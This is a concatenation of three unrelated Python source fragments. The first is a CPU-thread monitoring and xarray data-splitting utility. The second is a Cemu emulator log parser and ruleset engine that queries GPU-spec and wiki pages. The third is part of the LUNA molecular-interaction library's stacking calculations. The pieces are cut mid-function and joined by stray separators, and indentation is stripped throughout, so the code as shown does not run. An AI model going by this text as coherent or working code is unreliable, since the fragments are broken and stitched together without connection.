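#                                        #     'native_04', 'native_05']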
def argsparsefloatlist(txt):
"""
    Validate the list of float arguments.
    :param txt: argument of comma-separated float strings.
    :return: list of floats.
"""
txt = txt.split(',')
listarg = [float(i.strip()) for i in txt]
return listarg
#
# Functions CPU processes and Threads monitoring
#
def thread_cpu_num(proc_id, thread_id):
fname = "/proc/%s/task/%s/stat" % (proc_id, thread_id)
try:
with open(fname, 'rb') as f:
st = f.read().strip()
except IOError as err:
if err.errno == errno.ENOENT:
# no such file or directory; it means thread
# disappeared on us
pass
raise
st = st[st.find(b')') + 2:]
values = st.split(b' ')
cpu_num = int(values[36])
return cpu_num
def find_procs_by_name(name):
"""
    Return a list of psutil.Process objects whose name, executable or
    first command-line argument matches 'name'.
    :param name: Name to search for among running processes.
    :return: list of psutil.Process objects
"""
ls = []
for p in psutil.process_iter(attrs=["name", "exe", "cmdline"]):
if name == p.info['name'] or \
p.info['exe'] and os.path.basename(p.info['exe']) == name or \
p.info['cmdline'] and p.info['cmdline'][0] == name:
ls.append(p)
return ls
def procs_list(name, prs=None):
"""
    Build a dictionary with the running threads of a specific process.
    :param name: Name to search for among running processes.
    :param prs: dictionary of threads processed on previous calls, if any.
    :return: dictionary of processed threads.
"""
procs = find_procs_by_name(name)
if prs is None:
pts = {}
else:
pts = prs
for p in procs:
if p.pid in pts.keys():
thr = deepcopy(pts[p.pid])
else:
thr = {}
cpuchanged = False
for t in p.threads():
cpu_num = thread_cpu_num(p.pid, t.id)
if t.id in thr.keys():
if thr[t.id][-1] != cpu_num:
cpuchanged = True
thr[t.id].append(cpu_num)
else:
thr[t.id] = [cpu_num]
cpuchanged = True
if cpuchanged:
pts[p.pid] = deepcopy(thr)
return pts
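# Usage sketch (assumes a process named "python3" is running): repeated calls
# accumulate, per thread id, the history of CPU cores the thread was scheduled on.
#
#   pts = procs_list("python3")
#   pts = procs_list("python3", pts)   # pts[pid][tid] -> [cpu_num, cpu_num, ...]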
#
# Functions to detect python enviroment
#
def get_python_enviroment():
"""
    Detect the Python environment that the scripts are running on.
    :return: String with the name of the environment: pythonshell, ipythonshell,
jupyternotebookshell or unknownshell.
"""
try:
p_str = get_ipython().__class__.__name__
if p_str == 'ZMQInteractiveShell':
return 'jupyternotebookshell'
elif p_str == 'TerminalInteractiveShell':
return 'ipythonshell'
else:
            return 'unknownshell'
except:
return 'pythonshell'
#
# Functions to conversion xarray and lists
#
def data_detach(data):
"""
Detach the independent and dependent variables from DataArray.
:param data: A xarray DataArray with data to detach
:return: Tuple with the variables x and y.
"""
x = []
y = []
data_serie = data.to_series()
for i in data_serie.iteritems():
x.append(i[0])
y.append(i[1])
xnp = np.array(x)
ynp = np.array(y)
return {'x': xnp, 'y': ynp, 'dims': data.dims}
# TODO: Refactor the attach method to accept unsorted data
def data_attach(data, dims):
"""
Build a xarray DataArray from tuple with independent
and dependent variables.
:param data: A tuple of two lists: input values and output values
:param dims: Tuple of strings with dimensions
:return: DataArray of data.
"""
xnp = np.array(data['x'])
ynp = np.array(data['y'])
coords = {}
shape = []
for i, d in enumerate(dims):
x = sorted(np.unique(xnp[:, i]), key=int)
if d != 'frequency':
x = [int(v) for v in x]
coords[d] = x
shape.append(len(x))
data_da = xr.DataArray(np.reshape(ynp, newshape=shape),
dims=dims, coords=coords)
# sorted_base = []
# for i in range(len(coords) - 1):
# for j in coords[i][1]:
# for w in coords[i + 1][1]:
# sorted_base.append([j, w])
# idx_base = [np.where((xnp == (f, c)).all(axis=1))[0][0] for f, c in
# sorted_base]
# data_da = xr.DataArray(ynp[idx_base].reshape(tuple(shape)), coords=coords)
return data_da
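# Round-trip sketch for data_detach/data_attach (dimension names and values are
# illustrative assumptions):
#
#   da = xr.DataArray([[1.0, 2.0], [3.0, 4.0]],
#                     dims=("frequency", "cores"),
#                     coords={"frequency": [1.2e9, 2.4e9], "cores": [1, 2]})
#   d = data_detach(da)              # {'x': ..., 'y': ..., 'dims': ('frequency', 'cores')}
#   da2 = data_attach(d, d["dims"])  # rebuilds an equivalent DataArray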
def freq_hz(value):
label = float(value)
if label >= 1e9:
label = "%.2f GHz" % (label / 1e9)
elif label >= 1e6:
label = "%.2f MHz" % (label / 1e6)
elif label >= 1e3:
label = "%.2f KHz" % (label / 1e3)
else:
label = "%.2f Hz" % label
return label
def maptosequence(fseq,iseq):
"""
    Map a sequence of floats, each element in the range 0.0-1.0, onto another
    sequence of values: each float is treated as a relative position and the
    element of iseq at the equivalent index is selected.
    :param fseq: A list of float values between 0.0 and 1.0.
    :param iseq: A list of target values.
    :return: A list of values from iseq equivalent to the range of floats.
"""
equiv_seq = []
folds = len(iseq)-1
for i in fseq:
if i<0 or i>1.0:
            print("Error: Sequence of floats should contain only values "
                  "between 0.0 and 1.0")
return None
equiv_seq.append(iseq[round(float(i)*folds)])
return(equiv_seq)
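# Usage sketch: relative positions 0.0, 0.5 and 1.0 select the first, middle and
# last elements of the target sequence.
#
#   maptosequence([0.0, 0.5, 1.0], [10, 20, 30, 40, 50])   # -> [10, 30, 50]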
def measures_split_train_test(measure, train_size):
"""
    Split the train and test arrays from an xarray of measures using the
    Halton sequence to reduce discrepancy. The return object is a
    list of arrays: [train_x, test_x, train_y, test_y]
    :param measure: An xarray of measured values
    :param train_size: An integer with the number of elements to split into the train set
    :return: A list of arrays.
"""
m_detach = data_detach(measure)
if len(m_detach['x'])<train_size:
        print("Error: the train size should be lower than the size of arrays")
return None
dim = len(measure.dims)
sequencer = gh.Halton(dim)
points = np.array(sequencer.get(train_size))
x_rand = []
for i,v in enumerate(measure.dims):
x = measure.coords[v].values
x_rand.append(maptosequence(points[:,i],x))
x_rand = np.column_stack([i.reshape(len(i), 1) for i in np.array(x_rand)])
bool_idx = None
for i in x_rand:
if bool_idx is None:
bool_idx = (m_detach['x'] == i).all(axis=1)
else:
bool_idx = bool_idx | (m_detach['x'] == i).all(axis=1)
x_train = m_detach['x'][bool_idx]
x_test = m_detach['x'][~bool_idx]
y_train = m_detach['y'][bool_idx]
y_test = m_detach['y'][~bool_idx]
return [x_train,x_test,y_train,y_test]
def measures_idx_split_train_test(measure, train_size):
"""
    Split the train and test arrays from an xarray of measures using the
    Halton sequence to reduce discrepancy. The return object is a
    list of arrays of indexes: [train_idx, test_idx]
    :param measure: An xarray of measured values
    :param train_size: An integer with the number of elements to split into the train set
    :return: A list of arrays of indexes.
"""
m_detach = data_detach(measure)
if len(m_detach['x'])<train_size:
        print("Error: the train size should be lower than the size of arrays")
return None
dim = len(measure.dims)
sequencer = gh.Halton(dim)
points = np.array(sequencer.get(train_size))
x_rand = []
for i,v in enumerate(measure.dims):
x = measure.coords[v].values
x_rand.append(maptosequence(points[:,i],x))
x_rand = np.column_stack([i.reshape(len(i), 1) for i in np.array(x_rand)])
bool_idx = None
for i in x_rand:
if bool_idx is None:
bool_idx = (m_detach['x'] == i).all(axis=1)
else:
bool_idx = bool_idx | (m_detach['x'] == i).all(axis=1)
idx_train = np.where(bool_idx)[0]
idx_test = np.where(~bool_idx)[0]
return [idx_train,idx_test]
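# Usage sketch (assumes `measures` is an xarray.DataArray of measurements):
#
#   x_train, x_test, y_train, y_test = measures_split_train_test(measures, 16)
#   idx_train, idx_test = measures_idx_split_train_test(measures, 16)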
# def plot2D(data, | |
from difflib import get_close_matches
import re
import requests
def regex_group(search, num, default=None):
try:
return search.group(num)
except (AttributeError, IndexError):
return default
def regex_match(findall, num, default=None):
try:
return findall[num]
except (TypeError, IndexError):
return default
def default(fallback):
def decorator_func(func):
func.default = fallback
return func
return decorator_func
def name(string=None):
def decorator_func(func):
nonlocal string
        if string is None:
string = func.__name__
func.name = string
return func
return decorator_func
class Parser:
"""
Basic parser for Cemu log files.
This class should ONLY contain info that can be found using only the contents of the log file.
To extend this parser, inherit it and add your custom functions to self.embed.
See ExtraParser for an example.
"""
@name("init.loaded_title")
@default(False)
def loaded_title(self, file, info):
return bool(re.search(r"------- Loaded title -------", file))
@name("init.game_crashed")
@default(False)
def game_crashed(self, file, info):
if info["init.loaded_title"]:
return bool(re.search(r"Stack trace", file))
return False
@name("init.overwolf_issue")
@default(False)
def overwolf_issue(self, file, info):
if info["init.loaded_title"]:
return bool(re.search(r"ow-graphics-vulkan\.dll", file))
return False
@name("init.piracy_check")
@default(False)
def piracy_check(self, file, info):
if info["init.loaded_title"]:
return bool(re.search(r"\+0x001d9be4", file))
return False
@name("emulator.cemu_version")
@default("Unknown")
def cemu_version(self, file, info):
return regex_group(re.search(r"------- Init Cemu (.*?) -------", file), 1)
@name("emulator.cemuhook_version")
@default("N/A")
def cemuhook_version(self, file, info):
return regex_group(re.search(r"Cemuhook version: (.*?)$", file, re.M), 1)
@name("game.title_id")
@default("Unknown")
def title_id(self, file, info):
result = regex_group(re.search(r"TitleId: (.*?)$", file, re.M), 1)
return result.upper() if result else None
@name("game.title_version")
@default("Unknown")
def title_version(self, file, info):
return regex_group(re.search(r"TitleVersion: (v[0-9]+)", file), 1)
@name("game.rpx_hash.updated")
@default("Unknown")
def rpx_hash_updated(self, file, info):
updated = re.search(r"RPX hash \(updated\): (.*?)$", file, re.M)
if not updated:
updated = re.search(r"RPX hash: (.*?)$", file, re.M)
return regex_group(updated, 1)
@name("game.rpx_hash.base")
@default("Unknown")
def rpx_hash_base(self, file, info):
base = "N/A"
if info["game.rpx_hash.updated"]:
base = regex_group(re.search(r"RPX hash \(base\): (.*?)$", file, re.M), 1)
return base
@name("game.shadercache_name")
@default("Unknown")
def shadercache_name(self, file, info):
result = regex_group(re.search(r"shaderCache name: (.*?)$", file, re.M), 1)
if not result:
result = regex_group(
re.search(r"Shader cache file: shaderCache[\\/].*?[\\/](.*?)$", file, re.M),
1
)
return result
@name("specs.cpu")
@default("Unknown")
def cpu(self, file, info):
return regex_group(re.search(r"(?<!CPU[0-9] )CPU: (.*?) *$", file, re.M), 1)
@name("specs.ram")
@default("Unknown")
def ram(self, file, info):
return regex_group(re.search(r"RAM: ([0-9]+)MB", file), 1)
@name("specs.gpu")
@default("Unknown")
def gpu(self, file, info):
return regex_group(re.search(r"(?:GL_RENDERER: |Using GPU: )(.*?)$", file, re.M), 1)
@name("specs.gpu_driver")
@default("Unknown")
def gpu_driver(self, file, info):
result = regex_group(re.search(r"GL_VERSION: (.*?)$", file, re.M), 1)
if not result:
result = regex_group(re.search(r"Driver version: (.*?)$", file, re.M), 1)
return result
@name("settings.cpu_affinity")
@default("Unknown")
def cpu_affinity(self, file, info):
result = regex_group(re.search(r"Set process CPU affinity to (.*?)$", file, re.M), 1)
if result:
return " ".join(
map(
lambda x: f"CPU{ord(x[0]) - 0x30}",
result.split("CPU")[1:]
)
)
return "All cores"
@name("settings.cpu_mode")
@default("Unknown")
def cpu_mode(self, file, info):
return regex_group(re.search(r"CPU-Mode: (.*?)$", file, re.M), 1)
@name("settings.cpu_extensions")
@default("Unknown")
def cpu_extensions(self, file, info):
result = re.search(r"Recompiler initialized. CPU extensions: (.*?)$", file, re.M)
if result:
return list(filter(lambda x: x != "", regex_group(result, 1).split(' ')))
return []
@name("settings.disabled_cpu_extensions")
@default("")
def disabled_cpu_extensions(self, file, info):
used_extensions = re.search(r"CPU extensions that will actually be used by recompiler: (.*?)$", file, re.M)
used_extensions = regex_group(used_extensions, 1, '').split(' ')
if used_extensions != ['']:
return ', '.join(
list(filter(
                lambda x: x not in used_extensions,
info["settings.cpu_extensions"]
))
)
return None
@name("settings.backend")
@default("OpenGL")
def backend(self, file, info):
return regex_group(re.search(r"(Vulkan)", file), 1)
@name("settings.vulkan_async")
@default("Unknown")
def vulkan_async(self, file, info):
if info["settings.backend"] == "Vulkan":
result = re.search(r"Async compile: true", file)
return "Enabled" if result else "Disabled"
return "N/A"
@name("settings.gx2drawdone")
@default("Unknown")
def gx2drawdone(self, file, info):
if info["settings.backend"] == "Vulkan":
return "N/A"
result = re.search(r"Full sync at GX2DrawDone: true", file)
return "Enabled" if result else "Disabled"
@name("settings.console_region")
@default("Auto")
def console_region(self, file, info):
return regex_group(re.search(r"Console region: (.*?)$", file, re.M), 1)
@name("settings.thread_quantum")
@default("Default")
def thread_quantum(self, file, info):
return regex_group(re.search(r"Thread quantum set to (.*?)$", file, re.M), 1)
@name("settings.custom_timer_mode")
@default("Default")
def custom_timer_mode(self, file, info):
result = regex_group(re.search(r"Custom timer mode: (.*?)$", file, re.M), 1)
if result == "none":
result = "Default"
return result
def __init__(self):
self.embed = [
self.loaded_title, self.game_crashed,
self.overwolf_issue, self.piracy_check,
self.cemu_version, self.cemuhook_version,
self.title_id, self.title_version,
self.rpx_hash_updated, self.rpx_hash_base, self.shadercache_name,
self.cpu, self.ram, self.gpu, self.gpu_driver,
self.cpu_affinity, self.cpu_mode, self.cpu_extensions,
self.disabled_cpu_extensions, self.backend,
self.vulkan_async, self.gx2drawdone, self.console_region,
self.thread_quantum, self.custom_timer_mode
]
def parse(self, file):
info = {}
for func in self.embed:
result = func(file, info)
info[func.name] = result if (result != None) else func.default
return info
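# Minimal usage sketch (assumes `log_text` holds the contents of a Cemu log file):
#
#   parser = Parser()
#   info = parser.parse(log_text)
#   print(info["emulator.cemu_version"], info["game.title_id"])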
class ExtraParser(Parser):
"""
Same as Parser, with a few extra bits of info that must be fetched from
external sources (GPU support and game compatibility).
"""
@name("specs.gpu_specs.url")
@default("")
def gpu_specs_url(self, file, info):
query = info["specs.gpu"]
revised_query = re.sub(
r"(?:[0-9]GB|)/?(?:PCIe|)/?SSE2|\(TM\)|\(R\)| Graphics$|GB$| Series$|(?<=Mobile )Graphics$",
"", query
)
try:
req = requests.get(f"https://www.techpowerup.com/gpu-specs/?ajaxsrch={revised_query}")
except requests.exceptions.RequestException:
return None
req = req.text
if "Nothing found." in req:
return None
req = req.replace("\n","")
req = req.replace("\t","")
results = re.findall(r"<tr><td.+?><a href=\"(/gpu-specs/.*?)\">(.*?)</a>", req)
results = [list(reversed(x)) for x in results]
results = dict(results)
try:
matches = [
x for x in get_close_matches(query, results.keys())
if not (bool(re.search(r"mobile|max-q", query, re.I)) ^ bool(re.search(r"mobile|max-q", x, re.I)))
]
if results[matches[0]]:
return f"https://www.techpowerup.com{results[matches[0]]}"
return None
except (KeyError, IndexError):
return None
@name("specs.gpu_specs.html")
@default("")
def gpu_specs_html(self, file, info):
if info["specs.gpu_specs.url"]:
req = requests.get(info["specs.gpu_specs.url"])
if req.status_code == 200:
text = req.text
text = text.replace('\n','')
text = text.replace('\t','')
return text
return None
@name("specs.opengl")
@default("Unknown")
def opengl(self, file, info):
return regex_group(re.search(r"<dt>OpenGL</dt><dd>(.*?)</dd>", info["specs.gpu_specs.html"]), 1)
@name("specs.vulkan")
@default("Unknown")
def vulkan(self, file, info):
return regex_group(re.search(r"<dt>Vulkan</dt><dd>(.*?)</dd>", info["specs.gpu_specs.html"]), 1)
@name("game.wiki_page.url")
@default("")
def wiki_page_url(self, file, info):
try:
if self.title_ids[info["game.title_id"]]["wiki_has_game_id_redirect"]:
return f"http://wiki.cemu.info/wiki/{self.title_ids[info['game.title_id']]['game_id']}"
else:
# todo: use a cache of the cemu wiki instead of making a request on each parse
title = self.title_ids[info["game.title_id"]]["game_title"]
title = re.sub(r"[^\x00-\x7f]", r"", title)
title = title.replace(" ", "_")
return f"http://wiki.cemu.info/wiki/{title}"
except KeyError:
# this usually triggers when the title ID isn't in the database (mostly system titles)
return None
@name("game.wiki_page.html")
@default("")
def wiki_page_html(self, file, info):
if info["game.wiki_page.url"]:
req = requests.get(info["game.wiki_page.url"])
if req.status_code == 200:
return req.text
return None
@name("game.compat.rating")
@default("Unknown")
def compat_rating(self, file, info):
compat = regex_match(
re.findall(r"<tr style=\"vertical-align:middle;\">.*?</tr>", info["game.wiki_page.html"], re.M|re.S),
-1, ""
)
return regex_group(
re.search(r"<a href=\"/wiki/Category:.*?_\(Rating\)\" title=\"Category:.*? \(Rating\)\">(.*?)</a>", compat),
1
)
@name("game.compat.version")
@default("Unknown")
def compat_version(self, file, info):
compat = regex_match(
re.findall(r"<tr style=\"vertical-align:middle;\">.*?</tr>", info["game.wiki_page.html"], re.M|re.S),
-1, ""
)
return regex_group(
re.search(r"<a href=\"(?:/wiki/|/index\.php\?title=)Release.*? title=\".*?\">(.*?)</a>", compat),
1
)
def __init__(self, title_ids):
super().__init__()
self.title_ids = title_ids
self.embed += [
self.gpu_specs_url, self.gpu_specs_html, self.opengl, self.vulkan,
self.wiki_page_url, self.wiki_page_html,
self.compat_rating, self.compat_version
]
class RulesetParser:
"""
A class that takes log info parsed by {Parser} and a dictionary of rulesets,
and runs those rulesets on the data to determine potential problems.
To use this class, create an instance of it and run RulesetParser.parse().
"""
def __init__(self, rulesets):
self.rulesets = rulesets
    # determines whether ver1 <op> ver2, where <op> is one of: lt, eq, ne, gt
def version_check(self, ver1, ver2, operation):
ver1 = ver1.replace(" (Patreon release)", "")
ver2 = ver2.replace(" (Patreon release)", "")
ver1 = re.findall(r"(\d)\.(\d+)\.(\d+)([a-z]|$)", ver1, re.I)[0]
ver2 = re.findall(r"(\d)\.(\d+)\.(\d+)([a-z]|$)", ver2, re.I)[0]
ver1 = (int(ver1[0]), int(ver1[1]), int(ver1[2]), ver1[3])
ver2 = (int(ver2[0]), int(ver2[1]), int(ver2[2]), ver2[3])
# hotfixes should be ignored if ver2 doesn't specify a hotfix letter
if ver2[3] == '':
ver1 = ver1[:-1]
ver2 = ver2[:-1]
if operation == "lt":
for (n1, n2) in zip(ver1, ver2):
if n1 == n2:
continue
else:
return n1 < n2
elif operation == "eq":
return ver1 == ver2
elif operation == "ne":
return ver1 != ver2
elif operation == "gt":
for (n1, n2) in zip(ver1, ver2):
if n1 == n2:
continue
else:
return n1 > n2
else:
raise ValueError("Invalid operation; must be lt, eq, ne, or gt")
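    # Usage sketch: compares two Cemu version strings; the hotfix letter is
    # ignored when the reference version does not specify one.
    #
    #   self.version_check("1.22.2", "1.22.0", "gt")    # -> True
    #   self.version_check("1.15.1c", "1.15.1", "eq")   # -> True (hotfix ignored)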
def parse(self, log_file: str, info: dict) -> list:
relevant_info = []
relevant_info.extend(self.parse_ruleset(log_file, info, self.rulesets["any"]))
try:
ruleset = self.rulesets[info["game.title_id"]]
# to avoid duplicate rulesets,
# one title ID (usually USA) holds the game's ruleset,
# and the other regions simply redirect to it
if type(ruleset) == str:
ruleset = self.rulesets[ruleset]
relevant_info.extend(self.parse_ruleset(log_file, info, ruleset))
except KeyError:
pass
return relevant_info
def parse_ruleset(self, log_file: str, info: dict, ruleset: list) -> list:
messages = []
for rule in ruleset:
match_type = rule["match"]
message = rule["message"]
test_result = None
for test in rule["rules"]:
test_result = True
if test["property"] == "log":
prop = log_file
else:
prop = info[test["property"]]
rule_type = test["type"]
value = test["value"]
test_result = (\
(rule_type == "str_eq" and prop == value) or \
(rule_type == "str_ne" and prop != value) or \
(rule_type == "str_contains" and value in prop) or \
(rule_type == "str_not_contains" and value not in prop) or \
| |
                # If a nucleophile has 2 atoms, it will select the partially negative atom based on the electronegativity.
if len(elect_grp.atoms) == 2:
elect_atm = elect_grp.atoms[0] if (elect_grp.atoms[0].electronegativity
> elect_grp.atoms[1].electronegativity) else elect_grp.atoms[1]
cation_grp = inter.get_partner(elect_grp)
amide_inconsistences[(elect_atm, cation_grp)].append(inter)
inconsistencies = set()
for (atm1, atm2), inters in hbond_inconsistences.items():
if len(inters) > 1 and any([i.type == "Hydrogen bond" for i in inters]):
inconsistencies.update([i for i in inters if i.type != "Hydrogen bond"])
for (amide_atm, arom_grp), inters in amide_inconsistences.items():
if len(inters) > 1:
inconsistencies.update([i for i in inters if i.type != "Amide-aromatic stacking"])
interactions -= inconsistencies
# Clear the references of each interaction from the AtomGroup objects.
for inter in inconsistencies:
inter.clear_refs()
def remove_h2o_pairs_with_no_target(self, interactions):
"""Remove interactions of water with atoms and atom groups that do not belong to the target
of LUNA's analysis, which are chains or molecules defined as an :class:`~luna.mol.entry.Entry` instance.
Parameters
----------
interactions : :class:`~luna.interaction.type.InteractionType`
"""
valid_h2o_set = set()
invalid_inters = defaultdict(set)
for inter in interactions:
if inter.src_grp.is_water() and not inter.trgt_grp.has_target() and inter.src_grp not in valid_h2o_set:
invalid_inters[inter.src_grp].add(inter)
elif inter.trgt_grp.is_water() and not inter.src_grp.has_target() and inter.trgt_grp not in valid_h2o_set:
invalid_inters[inter.trgt_grp].add(inter)
else:
if inter.src_grp.is_water() and inter.trgt_grp.has_target():
valid_h2o_set.add(inter.src_grp)
if inter.src_grp in invalid_inters:
del invalid_inters[inter.src_grp]
if inter.trgt_grp.is_water() and inter.src_grp.has_target():
valid_h2o_set.add(inter.trgt_grp)
if inter.trgt_grp in invalid_inters:
del invalid_inters[inter.trgt_grp]
inters_to_remove = set([i for k in invalid_inters for i in invalid_inters[k]])
interactions -= inters_to_remove
# Clear the references of each interaction from the AtomGroup objects.
for inter in inters_to_remove:
inter.clear_refs()
def _default_functions(self):
return {
# Hydrophobic interaction
("Hydrophobic", "Hydrophobic"): [self.calc_hydrop],
("Hydrophobe", "Hydrophobe"): [self.calc_hydrop],
# Hydrogen bond
("Donor", "Acceptor"): [self.calc_hbond],
# Weak hydrogen bond
("WeakDonor", "Acceptor"): [self.calc_weak_hbond],
("WeakDonor", "WeakAcceptor"): [self.calc_weak_hbond],
("Donor", "Aromatic"): [self.calc_hbond_pi],
("WeakDonor", "Aromatic"): [self.calc_hbond_pi],
# Halogen bond
("HalogenDonor", "Acceptor"): [self.calc_xbond],
("HalogenDonor", "Aromatic"): [self.calc_xbond_pi],
# Chalcogen bond
("ChalcogenDonor", "Acceptor"): [self.calc_chalc_bond],
("ChalcogenDonor", "WeakAcceptor"): [self.calc_chalc_bond],
("ChalcogenDonor", "Aromatic"): [self.calc_chalc_bond_pi],
# Stackings
("Aromatic", "Aromatic"): [self.calc_pi_pi],
("Amide", "Aromatic"): [self.calc_amide_pi],
("Positive", "Aromatic"): [self.calc_cation_pi],
("PosIonizable", "Aromatic"): [self.calc_cation_pi],
("PositivelyIonizable", "Aromatic"): [self.calc_cation_pi],
# Ionic interaction
("NegativelyIonizable", "PositivelyIonizable"): [self.calc_ionic],
("NegIonizable", "PosIonizable"): [self.calc_ionic],
("Negative", "Positive"): [self.calc_ionic],
# Repulsive interaction
("NegativelyIonizable", "NegativelyIonizable"): [self.calc_repulsive],
("PositivelyIonizable", "PositivelyIonizable"): [self.calc_repulsive],
("NegIonizable", "NegIonizable"): [self.calc_repulsive],
("PosIonizable", "PosIonizable"): [self.calc_repulsive],
("Negative", "Negative"): [self.calc_repulsive],
("Positive", "Positive"): [self.calc_repulsive],
# Favorable multipolar interactions.
("Nucleophile", "Electrophile"): [self.calc_multipolar],
# Unfavorable multipolar interactions.
("Nucleophile", "Nucleophile"): [self.calc_multipolar],
("Electrophile", "Electrophile"): [self.calc_multipolar],
# Favorable ion-dipole interactions
("Nucleophile", "PositivelyIonizable"): [self.calc_ion_multipole],
("Nucleophile", "PosIonizable"): [self.calc_ion_multipole],
("Nucleophile", "Positive"): [self.calc_ion_multipole],
("Electrophile", "NegativelyIonizable"): [self.calc_ion_multipole],
("Electrophile", "NegIonizable"): [self.calc_ion_multipole],
("Electrophile", "Negative"): [self.calc_ion_multipole],
# Unfavorable ion-dipole interactions
("Nucleophile", "NegativelyIonizable"): [self.calc_ion_multipole],
("Nucleophile", "NegIonizable"): [self.calc_ion_multipole],
("Nucleophile", "Negative"): [self.calc_ion_multipole],
("Electrophile", "PositivelyIonizable"): [self.calc_ion_multipole],
("Electrophile", "PosIonizable"): [self.calc_ion_multipole],
("Electrophile", "Positive"): [self.calc_ion_multipole],
# Proximal, covalent, vdw, clash
("Atom", "Atom"): [self.calc_atom_atom, self.calc_proximal]
}
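    # Hedged dispatch sketch (not from the original source): the map above is keyed
    # by feature-name pairs, and each calculator is assumed to be called with a
    # (group1, group2, feat1, feat2) tuple, looking the pair up in either order.
    #
    #   funcs = self._default_functions()
    #   calcs = funcs.get((feat1.name, feat2.name)) or funcs.get((feat2.name, feat1.name), [])
    #   for calc in calcs:
    #       interactions.extend(calc(self, (group1, group2, feat1, feat2)))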
    # TODO: Include:
# Anion - pi system
# disulfide bond
# Weak donor - weak acceptor
    # Agostic and Hydrogen-Bonding X–H···M
    # agostic, anagostic
# Metalic complex
# REF: https://onlinelibrary.wiley.com/doi/epdf/10.1002/anie.200390319
# aromatic between hbond arrays
@staticmethod
def calc_cation_pi(self, params):
"""Default method to calculate cation-pi interactions.
Parameters
----------
params : tuple of (:class:`~luna.mol.groups.AtomGroup`,\
:class:`~luna.mol.groups.AtomGroup`,\
:class:`~luna.mol.features.ChemicalFeature`,\
:class:`~luna.mol.features.ChemicalFeature`)
The tuple follows the order (:math:`A`, :math:`B`, :math:`A_f`, :math:`B_f`), where
:math:`A` and :math:`B` are two :class:`~luna.mol.groups.AtomGroup` objects, and
:math:`A_f` and :math:`B_f` are their features (:class:`~luna.mol.features.ChemicalFeature` objects), respectively.
Returns
-------
: list
"""
if not self.add_non_cov:
return []
group1, group2, feat1, feat2 = params
interactions = []
cc_dist = im.euclidean_distance(group1.centroid, group2.centroid)
if (self.is_within_boundary(cc_dist, "boundary_cutoff", le)
and self.is_within_boundary(cc_dist, "max_dist_cation_pi_inter", le)):
params = {"dist_cation_pi_inter": cc_dist}
inter = InteractionType(group1, group2, "Cation-pi", params=params)
interactions.append(inter)
return interactions
@staticmethod
def calc_pi_pi(self, params):
"""Default method to calculate aromatic stackings.
Parameters
----------
params : tuple of (:class:`~luna.mol.groups.AtomGroup`,\
:class:`~luna.mol.groups.AtomGroup`,\
:class:`~luna.mol.features.ChemicalFeature`,\
:class:`~luna.mol.features.ChemicalFeature`)
The tuple follows the order (:math:`A`, :math:`B`, :math:`A_f`, :math:`B_f`), where
:math:`A` and :math:`B` are two :class:`~luna.mol.groups.AtomGroup` objects, and
:math:`A_f` and :math:`B_f` are their features (:class:`~luna.mol.features.ChemicalFeature` objects), respectively.
Returns
-------
: list
"""
if not self.add_non_cov:
return []
ring1, ring2, feat1, feat2 = params
interactions = []
cc_dist = im.euclidean_distance(ring1.centroid, ring2.centroid)
if (self.is_within_boundary(cc_dist, "boundary_cutoff", le)
and self.is_within_boundary(cc_dist, "max_cc_dist_pi_pi_inter", le)):
dihedral_angle = im.to_quad1(im.angle(ring1.normal, ring2.normal))
min_disp_angle = float("Inf")
for r1, r2 in [(ring1, ring2), (ring2, ring1)]:
cc_vect = r2.centroid - r1.centroid
disp_angle = im.to_quad1(im.angle(r1.normal, cc_vect))
if disp_angle < min_disp_angle:
ring1, ring2 = r1, r2
min_disp_angle = disp_angle
criteria = ["min_dihed_ang_slope_pi_pi_inter", "max_dihed_ang_slope_pi_pi_inter", "min_disp_ang_offset_pi_pi_inter",
"max_disp_ang_offset_pi_pi_inter"]
            # If the angle criteria are not defined, a specific pi-stacking classification is not possible as it
            # depends on them. Therefore, a more general classification is used instead, i.e., all such interactions will be "Pi-stacking".
if any([c not in self.inter_config for c in criteria]):
inter_type = "Pi-stacking"
elif self.is_within_boundary(min_disp_angle, "min_disp_ang_offset_pi_pi_inter", le):
if self.is_within_boundary(dihedral_angle, "min_dihed_ang_slope_pi_pi_inter", le):
inter_type = "Face-to-face pi-stacking"
elif self.is_within_boundary(dihedral_angle, "max_dihed_ang_slope_pi_pi_inter", ge):
inter_type = "Face-to-edge pi-stacking"
else:
inter_type = "Face-to-slope pi-stacking"
elif self.is_within_boundary(min_disp_angle, "max_disp_ang_offset_pi_pi_inter", ge):
if self.is_within_boundary(dihedral_angle, "min_dihed_ang_slope_pi_pi_inter", le):
inter_type = "Edge-to-edge pi-stacking"
elif self.is_within_boundary(dihedral_angle, "max_dihed_ang_slope_pi_pi_inter", ge):
inter_type = "Edge-to-face pi-stacking"
else:
inter_type = "Edge-to-slope pi-stacking"
else:
if self.is_within_boundary(dihedral_angle, "min_dihed_ang_slope_pi_pi_inter", le):
inter_type = "Displaced face-to-face pi-stacking"
elif self.is_within_boundary(dihedral_angle, "max_dihed_ang_slope_pi_pi_inter", ge):
inter_type = "Displaced face-to-edge pi-stacking"
else:
inter_type = "Displaced face-to-slope pi-stacking"
params = {"cc_dist_pi_pi_inter": cc_dist,
"dihed_ang_pi_pi_inter": dihedral_angle,
"disp_ang_pi_pi_inter": min_disp_angle}
inter = InteractionType(ring1, ring2, inter_type, directional=True, params=params)
interactions.append(inter)
return interactions
@staticmethod
def calc_amide_pi(self, params):
"""Default method to calculate amide-pi stackings.
Parameters
----------
params : tuple of (:class:`~luna.mol.groups.AtomGroup`,\
:class:`~luna.mol.groups.AtomGroup`,\
:class:`~luna.mol.features.ChemicalFeature`,\
:class:`~luna.mol.features.ChemicalFeature`)
The tuple follows the order (:math:`A`, :math:`B`, :math:`A_f`, :math:`B_f`), where
:math:`A` and :math:`B` are two :class:`~luna.mol.groups.AtomGroup` objects, and
:math:`A_f` and :math:`B_f` are their features (:class:`~luna.mol.features.ChemicalFeature` objects), respectively.
Returns
-------
: list
"""
if not self.add_non_cov:
return []
group1, group2, feat1, feat2 = params
interactions = []
if feat1.name == "Aromatic" and feat2.name == "Amide":
ring_grp = group1
amide_grp = group2
elif feat2.name == "Aromatic" and feat1.name == "Amide":
ring_grp = group2
amide_grp = group1
else:
            logger.warning("Amide-aromatic interactions require an aromatic and an amide group. However, the provided "
"groups have the features %s and %s." % (group1.feature_names, group2.feature_names))
return []
# Distance between the amide and ring centroids.
cc_dist = im.euclidean_distance(ring_grp.centroid, amide_grp.centroid)
if (self.is_within_boundary(cc_dist, "boundary_cutoff", le)
and self.is_within_boundary(cc_dist, "max_cc_dist_amide_pi_inter", le)):
dihedral_angle = im.to_quad1(im.angle(ring_grp.normal, amide_grp.normal))
cc_vect = amide_grp.centroid - ring_grp.centroid
